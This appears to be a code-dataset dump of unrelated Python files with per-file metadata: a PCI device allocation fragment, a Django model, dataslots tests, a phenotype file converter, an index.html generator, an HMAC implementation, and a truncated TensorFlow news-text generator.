used.append(BusDevFunc(bus = 0, dev = 1, func = 0))
insert_vuart_to_dev_dict(vm_node, devdict, used)
insert_ivsheme_to_dev_dict(scenario_etree, devdict, vm_id, used)
insert_pt_devs_to_dev_dict(vm_node, devdict, used)
create_device_node(allocation_etree, vm_id, devdict) | en | 0.687312 | #!/usr/bin/env python3 # # Copyright (C) 2021 Intel Corporation. # # SPDX-License-Identifier: BSD-3-Clause # # Constants for device name prefix # Exception bdf list # Some hardware drivers' bdf is hardcoded, the bdf cannot be changed even it is passtrhough devices. #04x}") #04x}") #x}") # never assign 0:00.0 to any emulated devices, it's reserved for pci hostbridge Assign an unused bdf to each of passtrhough devices. If a passtrhough device's bdf is in the list of HARDCODED_BDF_LIST, this device should apply the same bdf as native one. Calls find_unused_bdf to assign an unused bdf for the rest of passtrhough devices except the ones in HARDCODED_BDF_LIST. # assign the bdf of the devices in HARDCODED_BDF_LIST #04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper() # remove the pt_dev nodes which are in HARDCODED_BDF_LIST # call find_unused_bdf to assign an unused bdf for other passthrough devices except the ones in HARDCODED_BDF_LIST #04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper() Get all pci devices' bdf in native environment. return: list of pci devices' bdf Get all pre-launched vms' passthrough devices' bdf in native environment. return: list of passtrhough devices' bdf. #04x}".upper(), dev_node) #04x}".upper(), dev_node) #04x}".upper(), dev_node) | 2.275733 | 2 |
hivs_utils/abstract_models.py | tehamalab/hivs | 0 | 6612358 | <filename>hivs_utils/abstract_models.py
from django.db import models
from django.utils.translation import ugettext_lazy as _
class AbstractChoice(models.Model):
name = models.CharField(_('name'), max_length=255, unique=True)
code = models.CharField(_('code'), max_length=25, blank=True)
timestamp = models.DateTimeField('created', auto_now_add=True)
last_modified = models.DateTimeField(
_('last modified'),
auto_now=True,
null=True,
blank=True
)
class Meta:
abstract = True
def __str__(self):
return self.name
| <filename>hivs_utils/abstract_models.py
from django.db import models
from django.utils.translation import ugettext_lazy as _
class AbstractChoice(models.Model):
name = models.CharField(_('name'), max_length=255, unique=True)
code = models.CharField(_('code'), max_length=25, blank=True)
timestamp = models.DateTimeField('created', auto_now_add=True)
last_modified = models.DateTimeField(
_('last modified'),
auto_now=True,
null=True,
blank=True
)
class Meta:
abstract = True
def __str__(self):
return self.name
| none | 1 | 2.372501 | 2 | |
tests/test_dataslots.py | starhel/dataslots | 19 | 6612359 | import inspect
import platform
import sys
import weakref
from dataclasses import dataclass, field, InitVar
from typing import ClassVar, TypeVar, Generic
import pytest
from dataslots import dataslots, with_slots
def test_basic_slots(assertions):
@dataslots
@dataclass
class A:
x: int
y: float = 0.0
l: list = field(default_factory=list)
instance = A(10)
assertions.assert_slots(instance, ('x', 'y', 'l'))
assertions.assert_not_member('__dict__', instance)
assertions.assert_not_member('__weakref__', instance)
with pytest.raises(AttributeError):
instance.new_prop = 15
def test_skip_init_var(assertions):
@dataslots
@dataclass
class A:
x: int
y: InitVar[int]
def __post_init__(self, y: int):
self.x += y
assertions.assert_slots(A, ('x',))
def test_base_methods_present(assertions):
@dataslots
@dataclass(frozen=True)
class A:
x: int = 15
instance = A()
assertions.assert_member('__init__', instance)
assertions.assert_member('__eq__', instance)
assertions.assert_member('__ge__', instance)
assertions.assert_member('__repr__', instance)
assertions.assert_member('__hash__', instance)
def test_inheritance_no_dict(assertions):
@dataslots
@dataclass
class Base:
x: int
@dataslots
@dataclass
class Derived(Base):
y: int
assertions.assert_not_member('__dict__', Base(5))
assertions.assert_not_member('__dict__', Derived(5, 10))
def test_inheritance_base_class_without_slots(assertions):
@dataclass
class Base:
x: int
@dataslots
@dataclass
class Derived(Base):
y: int
derived = Derived(5, 10)
assertions.assert_member('__dict__', Base(5))
assertions.assert_member('__dict__', derived)
assertions.assert_slots(Derived, ('x', 'y'))
assertions.assert_assign_variable(derived)
def test_slots_and_dict(assertions):
@dataslots(add_dict=True)
@dataclass
class A:
x: int
instance = A(10)
assertions.assert_member('__slots__', instance)
assertions.assert_member('__dict__', instance)
assertions.assert_assign_variable(instance)
@pytest.mark.skipif(platform.python_implementation() == 'PyPy',
reason="PyPy can create weakref without __weakref__ attribute.")
def test_cannot_create_weakref():
@dataslots
@dataclass
class A:
x: int
instance = A(1)
with pytest.raises(TypeError):
weakref.ref(instance)
def test_no_weakref_attr(assertions):
@dataslots
@dataclass
class A:
x: int
instance = A(1)
assertions.assert_not_member('__weakref__', instance)
def test_weakref_flag():
@dataslots(add_weakref=True)
@dataclass
class A:
x: int
instance = A(1)
r = weakref.ref(instance)
assert instance is r()
def test_read_only_variable():
@dataslots
@dataclass
class A:
x: int
y = 5
a = A(10)
assert a.y == 5
with pytest.raises(AttributeError):
a.y = 20
def test_read_only_variable_class_var():
@dataslots
@dataclass
class A:
x: int
y: ClassVar[int] = 5
z: ClassVar[set] = set()
a = A(10)
assert a.y == 5
with pytest.raises(AttributeError):
a.y = 20
b = A(5)
a.z.add(10)
assert a.z == b.z
assert a.z is b.z
def test_check_docs():
@dataslots
@dataclass
class A:
"""Some class with one attribute"""
x: int
assert A.__doc__ == "Some class with one attribute"
def test_qualname():
@dataslots
@dataclass
class A:
x: int
qualname = f'{inspect.currentframe().f_code.co_name}.<locals>.A'
assert A.__qualname__ == qualname
def test_slots_inheritance(assertions):
@dataslots
@dataclass
class A:
x: int
@dataslots
@dataclass
class B(A):
y: int = 15
@dataslots
@dataclass
class C(B):
x: int = 20
assertions.assert_slots(A, ('x',))
assertions.assert_slots(B, ('y',))
assertions.assert_slots(C, ())
def test_multi_add_dict_weakref(assertions):
@dataslots(add_dict=True)
@dataclass
class A:
x: int
@dataslots(add_dict=True, add_weakref=True)
@dataclass
class B(A):
y: int = 15
@dataslots(add_dict=True, add_weakref=True)
@dataclass
class C(B):
x: int = 20
z: int = 50
assertions.assert_slots(A, ('x', '__dict__'))
assertions.assert_slots(B, ('y', '__weakref__'))
assertions.assert_slots(C, ('z',))
def test_slots_inheritance_no_defaults(assertions):
@dataslots
@dataclass
class A:
x: int
@dataslots
@dataclass
class B(A):
y: int
@dataslots
@dataclass
class C(B):
x: int
assertions.assert_slots(A, ('x',))
assertions.assert_slots(B, ('y',))
assertions.assert_slots(C, ())
def test_with_slots_deprecated():
@dataclass
class A:
x: int
pytest.deprecated_call(with_slots, A)
def test_custom_metaclass():
class MetaA(type):
pass
@dataslots
@dataclass
class A(metaclass=MetaA):
x: int
assert type(A) is MetaA
@pytest.mark.skipif(sys.version_info < (3, 7, 0), reason="Generic[T] is not supported in python 3.6")
def test_generic_typing(assertions):
T = TypeVar('T', int, float)
@dataslots
@dataclass
class A(Generic[T]):
x: T
y: T = 10
instance = A[int](x=5)
assertions.assert_slots(A, ('x', 'y'))
assert 10 == instance.y
assertions.assert_not_member('__dict__', instance)
def test_slots_already_defined():
@dataclass
class A:
__slots__ = ('x', 'y')
x: int
y: int
with pytest.raises(TypeError) as exc_info:
dataslots(A)
assert exc_info.match('do not define __slots__ if dataslots decorator is used')
def test_dataslots_used_without_dataclass():
class A:
x: int
with pytest.raises(TypeError) as exc_info:
dataslots(A)
assert exc_info.match('dataslots can be used only with dataclass')
| import inspect
import platform
import sys
import weakref
from dataclasses import dataclass, field, InitVar
from typing import ClassVar, TypeVar, Generic
import pytest
from dataslots import dataslots, with_slots
def test_basic_slots(assertions):
@dataslots
@dataclass
class A:
x: int
y: float = 0.0
l: list = field(default_factory=list)
instance = A(10)
assertions.assert_slots(instance, ('x', 'y', 'l'))
assertions.assert_not_member('__dict__', instance)
assertions.assert_not_member('__weakref__', instance)
with pytest.raises(AttributeError):
instance.new_prop = 15
def test_skip_init_var(assertions):
@dataslots
@dataclass
class A:
x: int
y: InitVar[int]
def __post_init__(self, y: int):
self.x += y
assertions.assert_slots(A, ('x',))
def test_base_methods_present(assertions):
@dataslots
@dataclass(frozen=True)
class A:
x: int = 15
instance = A()
assertions.assert_member('__init__', instance)
assertions.assert_member('__eq__', instance)
assertions.assert_member('__ge__', instance)
assertions.assert_member('__repr__', instance)
assertions.assert_member('__hash__', instance)
def test_inheritance_no_dict(assertions):
@dataslots
@dataclass
class Base:
x: int
@dataslots
@dataclass
class Derived(Base):
y: int
assertions.assert_not_member('__dict__', Base(5))
assertions.assert_not_member('__dict__', Derived(5, 10))
def test_inheritance_base_class_without_slots(assertions):
@dataclass
class Base:
x: int
@dataslots
@dataclass
class Derived(Base):
y: int
derived = Derived(5, 10)
assertions.assert_member('__dict__', Base(5))
assertions.assert_member('__dict__', derived)
assertions.assert_slots(Derived, ('x', 'y'))
assertions.assert_assign_variable(derived)
def test_slots_and_dict(assertions):
@dataslots(add_dict=True)
@dataclass
class A:
x: int
instance = A(10)
assertions.assert_member('__slots__', instance)
assertions.assert_member('__dict__', instance)
assertions.assert_assign_variable(instance)
@pytest.mark.skipif(platform.python_implementation() == 'PyPy',
reason="PyPy can create weakref without __weakref__ attribute.")
def test_cannot_create_weakref():
@dataslots
@dataclass
class A:
x: int
instance = A(1)
with pytest.raises(TypeError):
weakref.ref(instance)
def test_no_weakref_attr(assertions):
@dataslots
@dataclass
class A:
x: int
instance = A(1)
assertions.assert_not_member('__weakref__', instance)
def test_weakref_flag():
@dataslots(add_weakref=True)
@dataclass
class A:
x: int
instance = A(1)
r = weakref.ref(instance)
assert instance is r()
def test_read_only_variable():
@dataslots
@dataclass
class A:
x: int
y = 5
a = A(10)
assert a.y == 5
with pytest.raises(AttributeError):
a.y = 20
def test_read_only_variable_class_var():
@dataslots
@dataclass
class A:
x: int
y: ClassVar[int] = 5
z: ClassVar[set] = set()
a = A(10)
assert a.y == 5
with pytest.raises(AttributeError):
a.y = 20
b = A(5)
a.z.add(10)
assert a.z == b.z
assert a.z is b.z
def test_check_docs():
@dataslots
@dataclass
class A:
"""Some class with one attribute"""
x: int
assert A.__doc__ == "Some class with one attribute"
def test_qualname():
@dataslots
@dataclass
class A:
x: int
qualname = f'{inspect.currentframe().f_code.co_name}.<locals>.A'
assert A.__qualname__ == qualname
def test_slots_inheritance(assertions):
@dataslots
@dataclass
class A:
x: int
@dataslots
@dataclass
class B(A):
y: int = 15
@dataslots
@dataclass
class C(B):
x: int = 20
assertions.assert_slots(A, ('x',))
assertions.assert_slots(B, ('y',))
assertions.assert_slots(C, ())
def test_multi_add_dict_weakref(assertions):
@dataslots(add_dict=True)
@dataclass
class A:
x: int
@dataslots(add_dict=True, add_weakref=True)
@dataclass
class B(A):
y: int = 15
@dataslots(add_dict=True, add_weakref=True)
@dataclass
class C(B):
x: int = 20
z: int = 50
assertions.assert_slots(A, ('x', '__dict__'))
assertions.assert_slots(B, ('y', '__weakref__'))
assertions.assert_slots(C, ('z',))
def test_slots_inheritance_no_defaults(assertions):
@dataslots
@dataclass
class A:
x: int
@dataslots
@dataclass
class B(A):
y: int
@dataslots
@dataclass
class C(B):
x: int
assertions.assert_slots(A, ('x',))
assertions.assert_slots(B, ('y',))
assertions.assert_slots(C, ())
def test_with_slots_deprecated():
@dataclass
class A:
x: int
pytest.deprecated_call(with_slots, A)
def test_custom_metaclass():
class MetaA(type):
pass
@dataslots
@dataclass
class A(metaclass=MetaA):
x: int
assert type(A) is MetaA
@pytest.mark.skipif(sys.version_info < (3, 7, 0), reason="Generic[T] is not supported in python 3.6")
def test_generic_typing(assertions):
T = TypeVar('T', int, float)
@dataslots
@dataclass
class A(Generic[T]):
x: T
y: T = 10
instance = A[int](x=5)
assertions.assert_slots(A, ('x', 'y'))
assert 10 == instance.y
assertions.assert_not_member('__dict__', instance)
def test_slots_already_defined():
@dataclass
class A:
__slots__ = ('x', 'y')
x: int
y: int
with pytest.raises(TypeError) as exc_info:
dataslots(A)
assert exc_info.match('do not define __slots__ if dataslots decorator is used')
def test_dataslots_used_without_dataclass():
class A:
x: int
with pytest.raises(TypeError) as exc_info:
dataslots(A)
assert exc_info.match('dataslots can be used only with dataclass')
| en | 0.874776 | Some class with one attribute | 2.265652 | 2 |
methods/heritability/parquet2pheno.py | liangyy/ukb_idp_genetic_arch | 0 | 6612360 | def write_pheno(df, fn):
with open(fn, 'w') as f:
for i, p in zip(df.indiv.to_list(), df.pheno.to_list()):
f.write(f'{i}\t{i}\t{p}\n')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(prog='parquet2pheno.py', description='''
Read parquet file and generate the gcta pheno file.
''')
parser.add_argument('--input', help='''
Input parquet format.
''')
parser.add_argument('--pheno_col', help='''
Column name of the phenotype of interest.
''')
parser.add_argument('--indiv_col', help='''
Column name of the individual ID.
''')
parser.add_argument('--output', help='''
Output file name.
''')
args = parser.parse_args()
import logging, time, sys, os
# configing util
logging.basicConfig(
level = logging.INFO,
stream = sys.stderr,
format = '%(asctime)s %(message)s',
datefmt = '%Y-%m-%d %I:%M:%S %p'
)
import pandas as pd
logging.info('Loading phenotypes.')
df = pd.read_parquet(args.input, columns=[args.indiv_col, args.pheno_col])
df.rename(columns={args.indiv_col: 'indiv', args.pheno_col: 'pheno'}, inplace=True)
logging.info('Writing to disk.')
write_pheno(df, args.output)
| def write_pheno(df, fn):
with open(fn, 'w') as f:
for i, p in zip(df.indiv.to_list(), df.pheno.to_list()):
f.write(f'{i}\t{i}\t{p}\n')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(prog='parquet2pheno.py', description='''
Read parquet file and generate the gcta pheno file.
''')
parser.add_argument('--input', help='''
Input parquet format.
''')
parser.add_argument('--pheno_col', help='''
Column name of the phenotype of interest.
''')
parser.add_argument('--indiv_col', help='''
Column name of the individual ID.
''')
parser.add_argument('--output', help='''
Output file name.
''')
args = parser.parse_args()
import logging, time, sys, os
# configing util
logging.basicConfig(
level = logging.INFO,
stream = sys.stderr,
format = '%(asctime)s %(message)s',
datefmt = '%Y-%m-%d %I:%M:%S %p'
)
import pandas as pd
logging.info('Loading phenotypes.')
df = pd.read_parquet(args.input, columns=[args.indiv_col, args.pheno_col])
df.rename(columns={args.indiv_col: 'indiv', args.pheno_col: 'pheno'}, inplace=True)
logging.info('Writing to disk.')
write_pheno(df, args.output)
| en | 0.647164 | Read parquet file and generate the gcta pheno file. Input parquet format. Column name of the phenotype of interest. Column name of the individual ID. Output file name. # configing util | 2.790579 | 3 |
update.py | sitius2/python-hindex | 0 | 6612361 | <reponame>sitius2/python-hindex
#!/usr/bin/env python3
import os
import re
import argparse
VERSION = "1.6"
parser = argparse.ArgumentParser(description="Generate index.html from the files in the given directory,"
" if no directory is specified,"" use the current one", )
parser.add_argument("-e", "--exclude", nargs=1, help="A file that contains names of files and directories "
"that shall be excluded in the index.html", default=None)
parser.add_argument("-t", "--title", nargs=1, help="Sets the title tag of the index.html", default="Server")
parser.add_argument("-h1", "--headline-files", nargs=1, help="Headline for the downloadable files section",
metavar="HEADLINE", default="Downloadable files")
parser.add_argument("-h2", "--headline-directories", nargs=1, help="Headline for the browseable"
"directories section", metavar="HEADLINE", default="Browseable directories")
parser.add_argument("-c", "--charset", nargs=1, help="Specify the charset that should be used in the meta tag",
default="utf-8")
parser.add_argument("-l", "--list-type", nargs=1, help="Specify the list type that should be use (default: 'ul'",
default="ul")
parser.add_argument("path", help="Path of which the index.html shall be created", default=os.getcwd())
parser.add_argument("-i", "--interactive", help="Enter interactive console mode", action="store_true")
parser.add_argument("-v", "--version", help="Print program version", action="version", version=VERSION)
args = parser.parse_args()
# if len(sys.argv) > 1:
# for arg in range(len(sys.argv)):
# if sys.argv[arg][:1] != "-" and arg != len(sys.argv):
# continue
# elif arg == "-e":
# exclude_file = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-t":
# page_title = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-h1":
# file_headline = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-h2":
# dirs_headline = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-c":
# html_charset = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-l":
# html_list_type = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# else:
# if os.path.exists(sys.argv[arg]) and sys.argv[arg] != "":
# work_path = sys.argv[arg]
# else:
# print("ERROR: Path does not exist...")
# print(HELP_MSG)
# sys.exit(1)
# else:
# work_path = os.getcwd()
class HtmlFileCreator:
def __init__(self, path=args.path, title=args.title, charset=args.charset, headline_files=args.headline_files,
headline_directories=args.headline_directories, list_type=args.list_type):
self._path = "".join(path)
self._title = "".join(title)
self._charset = "".join(charset)
self._headline_files = "".join(headline_files)
self._headline_directories = "".join(headline_directories)
self._list_type = "".join(list_type)
_content = []
_files = []
_files_list = []
_files_html = ""
_dirs = []
_dirs_list = []
_dirs_html = ""
_extension_pattern = r"\.[^.]+"
_html_preset = ""
def get_content(self):
self._content = os.listdir(self._path)
counter = len(exclude_files)
iteration = 0
while iteration <= counter:
for x in self._content:
for y in exclude_files:
if x == y:
self._content.remove(x)
iteration += 1
def sort_content(self):
for item in self._content:
if os.path.isdir(item):
self._dirs.append(item)
elif os.path.isfile(item):
self._files.append(item)
else:
continue
def create_html_page(self):
self._html_preset = """<!DOCTYPE html />
<html>
<head>
<title> """ + self._title + """</title>
<meta charset=\"""" + self._charset + """\" />
</head>
<body>
<h1>""" + self._headline_files + """</h1>
<""" + self._list_type + """>
""" + self._files_html.join(str(x) for x in self._files_list) + """
</""" + self._list_type + """>
<h1>""" + self._headline_directories + """</h1>
<""" + self._list_type + """>
""" + self._dirs_html.join(str(x) for x in self._dirs_list) + """
</""" + self._list_type + """>
</body>
</html>"""
def create_index_list(self):
for item in self._dirs:
self._dirs_list.append('<li><a href="{}">{}</a></li>\n'.format(item, item))
for item in self._files:
desc = re.search(self._extension_pattern, item)
if desc is not None:
self._files_list.append('<li><a href="{}" download>{}</a></li>\n'
.format(item, item.replace(desc.group(), "")))
else:
self._files_list.append('<li><a href="{}" download>{}</a></li>\n'.format(item, item))
def create_index_html(self):
if os.path.exists("index.html"):
try:
with open("index.html", "w") as indexf:
indexf.seek(0)
indexf.truncate()
indexf.write(self._html_preset)
except PermissionError:
print("Can't create index.html, maybe try running as root?")
import sys
sys.exit(1)
else:
try:
with open("index.html", "x") as indexf:
indexf.write(self._html_preset)
except PermissionError:
print("Can't create index.html, maybe try running as root?")
import sys
sys.exit(1)
exclude_files = []
if args.exclude is not None:
exclude_list = "".join(str(x) for x in args.exclude)
if os.path.exists(exclude_list):
try:
f = open(exclude_list, "r")
except PermissionError:
print("Can't open exclude file, maybe try running as root?")
import sys
sys.exit(1)
lines = f.readlines()
for line in lines:
exclude_files.append(line.rstrip())
f.close()
else:
print("Exclude file does not exist")
PageGen = HtmlFileCreator()
print("Getting files of directory...")
PageGen.get_content()
print("Sorting files and directories...")
PageGen.sort_content()
print("Creating index list...")
PageGen.create_index_list()
print("Creating page content...")
PageGen.create_html_page()
print("Creating index.html...")
PageGen.create_index_html()
print("Done!")
| #!/usr/bin/env python3
import os
import re
import argparse
VERSION = "1.6"
parser = argparse.ArgumentParser(description="Generate index.html from the files in the given directory,"
" if no directory is specified,"" use the current one", )
parser.add_argument("-e", "--exclude", nargs=1, help="A file that contains names of files and directories "
"that shall be excluded in the index.html", default=None)
parser.add_argument("-t", "--title", nargs=1, help="Sets the title tag of the index.html", default="Server")
parser.add_argument("-h1", "--headline-files", nargs=1, help="Headline for the downloadable files section",
metavar="HEADLINE", default="Downloadable files")
parser.add_argument("-h2", "--headline-directories", nargs=1, help="Headline for the browseable"
"directories section", metavar="HEADLINE", default="Browseable directories")
parser.add_argument("-c", "--charset", nargs=1, help="Specify the charset that should be used in the meta tag",
default="utf-8")
parser.add_argument("-l", "--list-type", nargs=1, help="Specify the list type that should be use (default: 'ul'",
default="ul")
parser.add_argument("path", help="Path of which the index.html shall be created", default=os.getcwd())
parser.add_argument("-i", "--interactive", help="Enter interactive console mode", action="store_true")
parser.add_argument("-v", "--version", help="Print program version", action="version", version=VERSION)
args = parser.parse_args()
# if len(sys.argv) > 1:
# for arg in range(len(sys.argv)):
# if sys.argv[arg][:1] != "-" and arg != len(sys.argv):
# continue
# elif arg == "-e":
# exclude_file = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-t":
# page_title = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-h1":
# file_headline = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-h2":
# dirs_headline = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-c":
# html_charset = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# elif arg == "-l":
# html_list_type = sys.argv[arg+1]
# if arg + 1 == len(sys.argv):
# break
# else:
# if os.path.exists(sys.argv[arg]) and sys.argv[arg] != "":
# work_path = sys.argv[arg]
# else:
# print("ERROR: Path does not exist...")
# print(HELP_MSG)
# sys.exit(1)
# else:
# work_path = os.getcwd()
class HtmlFileCreator:
def __init__(self, path=args.path, title=args.title, charset=args.charset, headline_files=args.headline_files,
headline_directories=args.headline_directories, list_type=args.list_type):
self._path = "".join(path)
self._title = "".join(title)
self._charset = "".join(charset)
self._headline_files = "".join(headline_files)
self._headline_directories = "".join(headline_directories)
self._list_type = "".join(list_type)
_content = []
_files = []
_files_list = []
_files_html = ""
_dirs = []
_dirs_list = []
_dirs_html = ""
_extension_pattern = r"\.[^.]+"
_html_preset = ""
def get_content(self):
self._content = os.listdir(self._path)
counter = len(exclude_files)
iteration = 0
while iteration <= counter:
for x in self._content:
for y in exclude_files:
if x == y:
self._content.remove(x)
iteration += 1
def sort_content(self):
for item in self._content:
if os.path.isdir(item):
self._dirs.append(item)
elif os.path.isfile(item):
self._files.append(item)
else:
continue
def create_html_page(self):
self._html_preset = """<!DOCTYPE html />
<html>
<head>
<title> """ + self._title + """</title>
<meta charset=\"""" + self._charset + """\" />
</head>
<body>
<h1>""" + self._headline_files + """</h1>
<""" + self._list_type + """>
""" + self._files_html.join(str(x) for x in self._files_list) + """
</""" + self._list_type + """>
<h1>""" + self._headline_directories + """</h1>
<""" + self._list_type + """>
""" + self._dirs_html.join(str(x) for x in self._dirs_list) + """
</""" + self._list_type + """>
</body>
</html>"""
def create_index_list(self):
for item in self._dirs:
self._dirs_list.append('<li><a href="{}">{}</a></li>\n'.format(item, item))
for item in self._files:
desc = re.search(self._extension_pattern, item)
if desc is not None:
self._files_list.append('<li><a href="{}" download>{}</a></li>\n'
.format(item, item.replace(desc.group(), "")))
else:
self._files_list.append('<li><a href="{}" download>{}</a></li>\n'.format(item, item))
def create_index_html(self):
if os.path.exists("index.html"):
try:
with open("index.html", "w") as indexf:
indexf.seek(0)
indexf.truncate()
indexf.write(self._html_preset)
except PermissionError:
print("Can't create index.html, maybe try running as root?")
import sys
sys.exit(1)
else:
try:
with open("index.html", "x") as indexf:
indexf.write(self._html_preset)
except PermissionError:
print("Can't create index.html, maybe try running as root?")
import sys
sys.exit(1)
exclude_files = []
if args.exclude is not None:
exclude_list = "".join(str(x) for x in args.exclude)
if os.path.exists(exclude_list):
try:
f = open(exclude_list, "r")
except PermissionError:
print("Can't open exclude file, maybe try running as root?")
import sys
sys.exit(1)
lines = f.readlines()
for line in lines:
exclude_files.append(line.rstrip())
f.close()
else:
print("Exclude file does not exist")
PageGen = HtmlFileCreator()
print("Getting files of directory...")
PageGen.get_content()
print("Sorting files and directories...")
PageGen.sort_content()
print("Creating index list...")
PageGen.create_index_list()
print("Creating page content...")
PageGen.create_html_page()
print("Creating index.html...")
PageGen.create_index_html()
print("Done!") | en | 0.193869 | #!/usr/bin/env python3 # if len(sys.argv) > 1: # for arg in range(len(sys.argv)): # if sys.argv[arg][:1] != "-" and arg != len(sys.argv): # continue # elif arg == "-e": # exclude_file = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-t": # page_title = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-h1": # file_headline = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-h2": # dirs_headline = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-c": # html_charset = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # elif arg == "-l": # html_list_type = sys.argv[arg+1] # if arg + 1 == len(sys.argv): # break # else: # if os.path.exists(sys.argv[arg]) and sys.argv[arg] != "": # work_path = sys.argv[arg] # else: # print("ERROR: Path does not exist...") # print(HELP_MSG) # sys.exit(1) # else: # work_path = os.getcwd() <!DOCTYPE html /> <html> <head> <title> </title> <meta charset=\ \" /> </head> <body> <h1> </h1> < > </ > <h1> </h1> < > </ > </body> </html> | 2.99875 | 3 |
MyCrypto/hash/hmac.py | hiyouga/cryptography-experiment | 8 | 6612362 | <filename>MyCrypto/hash/hmac.py
import sys
sys.path.append("../..")
import hmac
from MyCrypto.utils.bitarray import bitarray
from MyCrypto.hash.sha_utils import Digest
from MyCrypto.hash.sha1 import SHA1
from MyCrypto.hash.sha3 import SHA3_512
class HMAC:
def __init__(self, hash_func:callable):
self._hash_func = hash_func
self._n = hash_func.digest_size * 8
self._b = hash_func.hmac_size
self._ipad = bitarray.concat([bitarray(0x36, 8)]*(self._b//8))
self._opad = bitarray.concat([bitarray(0x5C, 8)]*(self._b//8))
def __call__(self, key:bytes, data:bytes) -> bytes:
# padding key
if len(key) > self._b//8:
key = self._hash_func(key).digest
key = bitarray.from_bytes(key)
k = bitarray.concat((key, bitarray(0, self._b-len(key))))
# process data
data = bitarray.from_bytes(data)
si = k ^ self._ipad
data = bitarray.concat((si, data))
data = self._hash(data)
so = k ^ self._opad
data = bitarray.concat((so, data))
data = self._hash(data)
return Digest(data.to_bytes())
def _hash(self, data:bitarray) -> bitarray:
data = self._hash_func(data.to_bytes()).digest
return bitarray.from_bytes(data)
if __name__ == '__main__':
message = b'The quick brown fox jumps over the lazy dog'
key = b'key'
stdsha1hmac = hmac.new(key, message, digestmod='sha1')
mysha1hmac = HMAC(SHA1())
print(stdsha1hmac.hexdigest())
print(mysha1hmac(key, message).hexdigest)
stdsha3hmac = hmac.new(key, message, digestmod='sha3_512')
mysha3hmac = HMAC(SHA3_512())
print(stdsha3hmac.hexdigest())
print(mysha3hmac(key, message).hexdigest)
| <filename>MyCrypto/hash/hmac.py
import sys
sys.path.append("../..")
import hmac
from MyCrypto.utils.bitarray import bitarray
from MyCrypto.hash.sha_utils import Digest
from MyCrypto.hash.sha1 import SHA1
from MyCrypto.hash.sha3 import SHA3_512
class HMAC:
def __init__(self, hash_func:callable):
self._hash_func = hash_func
self._n = hash_func.digest_size * 8
self._b = hash_func.hmac_size
self._ipad = bitarray.concat([bitarray(0x36, 8)]*(self._b//8))
self._opad = bitarray.concat([bitarray(0x5C, 8)]*(self._b//8))
def __call__(self, key:bytes, data:bytes) -> bytes:
# padding key
if len(key) > self._b//8:
key = self._hash_func(key).digest
key = bitarray.from_bytes(key)
k = bitarray.concat((key, bitarray(0, self._b-len(key))))
# process data
data = bitarray.from_bytes(data)
si = k ^ self._ipad
data = bitarray.concat((si, data))
data = self._hash(data)
so = k ^ self._opad
data = bitarray.concat((so, data))
data = self._hash(data)
return Digest(data.to_bytes())
def _hash(self, data:bitarray) -> bitarray:
data = self._hash_func(data.to_bytes()).digest
return bitarray.from_bytes(data)
if __name__ == '__main__':
message = b'The quick brown fox jumps over the lazy dog'
key = b'key'
stdsha1hmac = hmac.new(key, message, digestmod='sha1')
mysha1hmac = HMAC(SHA1())
print(stdsha1hmac.hexdigest())
print(mysha1hmac(key, message).hexdigest)
stdsha3hmac = hmac.new(key, message, digestmod='sha3_512')
mysha3hmac = HMAC(SHA3_512())
print(stdsha3hmac.hexdigest())
print(mysha3hmac(key, message).hexdigest)
| en | 0.15201 | # padding key # process data | 2.756606 | 3 |
BBC-news-data/software-stack/model.py | navyamehta/economic-data-NLP | 0 | 6612363 | <filename>BBC-news-data/software-stack/model.py
import tensorflow as tf
import tensorflow_hub as hub
import numpy as np
import os
import re
from tensorflow.keras.layers import LSTM, TimeDistributed, Dense, Bidirectional, Input, Embedding
from tensorflow.keras.layers import Dropout, Conv1D, Flatten
from tensorflow.keras.layers import Concatenate, Dot, Activation
import collections
import nltk.stem
class Model():
## FIRST-ORDER FUNCTIONS
def __init__(self, modelpath="../data/newspred.h5", usepath="./universal-sentence-encoder_4"):
self.embed = hub.load(usepath)
self.vocab = np.array([char for char in " abcdefghijklmnopqrstuvwxyz"])
self.model = self.model_maker()
self.model.load_weights(modelpath)
def generate(self, text, numwords, k=3):
text = self.text_cleaner(text)
if (len(text)<100): return None, None, False
state = self.embed([text]).numpy()
start = np.zeros((1,100))
start[0] = [np.where(self.vocab==r)[0][0] for r in text[:100]]
stim, seq = text[:100], ""
wordsgen = 0
while (wordsgen<numwords):
maxval, beamseq = self.beamer(start.copy(), state.copy(), k)
seq+="".join([self.vocab[np.int(i)] for i in beamseq])
start[0,:-k] = start[0,k:]
start[0,-k:] = beamseq
wordsgen+=np.sum(np.array(beamseq)==0)
#Incase we overshoot numwords with numerous words in a single beam
seq = " ".join(seq.split()[:wordsgen])
return stim, seq, True
## SECOND-ORDER FUNCTONS
def model_maker(self, latentdim=512):
tf.keras.backend.clear_session()
state = Input(shape=(latentdim,))
decinput = Input(shape=(100,))
embed_layer = Embedding(self.vocab.shape[0], self.vocab.shape[0], weights=[np.eye(self.vocab.shape[0])],
trainable=False, input_length=100)
embedval = embed_layer(decinput)
lstm_layer1 = LSTM(latentdim, return_sequences=True, return_state=True)
lstm1val, _, _ = lstm_layer1(embedval, initial_state=[state, state])
lstm1val = Dropout(0.2)(lstm1val)
lstm_layer2 = Bidirectional(LSTM(latentdim, return_sequences=True, return_state=True))
